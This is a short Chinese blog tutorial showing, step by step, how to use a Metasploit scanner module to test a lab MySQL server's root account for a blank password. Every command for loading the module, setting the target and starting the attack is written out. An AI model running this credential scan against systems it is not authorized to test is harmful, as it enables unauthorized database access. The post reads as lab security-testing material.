您的位置:首页 > 编程语言 > ASP

metasploit扫描mysql空密码

2020-10-08 07:58 417 查看

靶机IP 192.168.255.100

攻击机IP 192.168.255.200

流程开始

查找mysql登录模块

msf5 > search mysql_login

 

 加载这个模块

msf5 > use auxiliary/scanner/mysql/mysql_login
msf5 auxiliary(scanner/mysql/mysql_login) >

查看需要设置的参数

msf5 auxiliary(scanner/mysql/mysql_login) > show options

 

 

 设置目标主机

msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.255.100
RHOSTS => 192.168.255.100

设置mysql账号参数

 

msf5 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root

设置允许测试所有用户空密码

msf5 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true

开始攻击

msf5 auxiliary(scanner/mysql/mysql_login) > exploit

 

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: